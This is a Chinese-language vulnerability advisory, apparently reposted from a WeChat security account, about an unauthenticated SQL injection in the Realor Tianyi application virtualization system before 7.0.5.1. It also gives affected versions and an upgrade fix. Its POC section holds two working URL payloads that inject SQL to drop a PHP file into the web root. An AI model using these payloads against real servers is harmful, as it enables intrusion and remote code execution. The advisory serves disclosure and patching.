漏洞预警 | 瑞友天翼应用虚拟化系统SQL注入漏洞

admin

107480
文章

90
评论

2024年5月13日08:46:12评论9 views字数 745阅读2分29秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

瑞友天翼应用虚拟化系统是基于云计算技术的应用虚拟化解决方案，可以帮助用户实现应用的快速部署和管理。

漏洞预警 | 瑞友天翼应用虚拟化系统SQL注入漏洞

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：瑞友天翼应用虚拟化系统中的HomeControllerAdminController存在appsave/appdel两个无需鉴权并且存在SQL注入的风险的接口，未授权的攻击者可利用此漏洞获取敏感信息，由于默认未通过secure_file_priv配置限制mysql写入文件路径，攻击者可利用此漏洞读写本地任意文件，从而远程执行任意代码。

0x04 影响版本

瑞友天翼应用虚拟化系统 < 7.0.5.1

0x05 POC

{URL}/hmrao.php?s=/Admin/appsave&appid=11111111%27);select+%27%3C%3fphp+echo+md5(11111111)%3f%3E%27+into+dumpfile+%27../../WebRoot/11122222.php%27%3b--+</{URL}/hmrao.php?s=/Admin/appdel&list=11111111'));select+'<%3fphp+echo+md5(123)%3f>'+into+dumpfile+'../../WebRoot/1234.php'%3b--+

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

http://www.realor.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 瑞友天翼应用虚拟化系统SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 瑞友天翼应用虚拟化系统SQL注入漏洞

暂无

Serv-U 目录遍历漏洞(CVE-2024-28995)

世邦通信 SPON IP网络对讲广播系统 my_parser.php 任意文件上传漏洞

某水文系统平台弱口令漏洞复现

Google Analytics开放重定向漏洞

SeaCMS海洋影视管理系统远程代码执行漏洞

电信网关配置管理系统命令执行漏洞

Apache OFBiz 目录遍历导致RCE漏洞(CVE-2024-36104)

CVE-2024-32113 漏洞复现（附POC）

用友NC isAgentLimit 接口 SQL注入漏洞

Fastadmin框架存在任意文件读取漏洞

发表评论

在线咨询

微信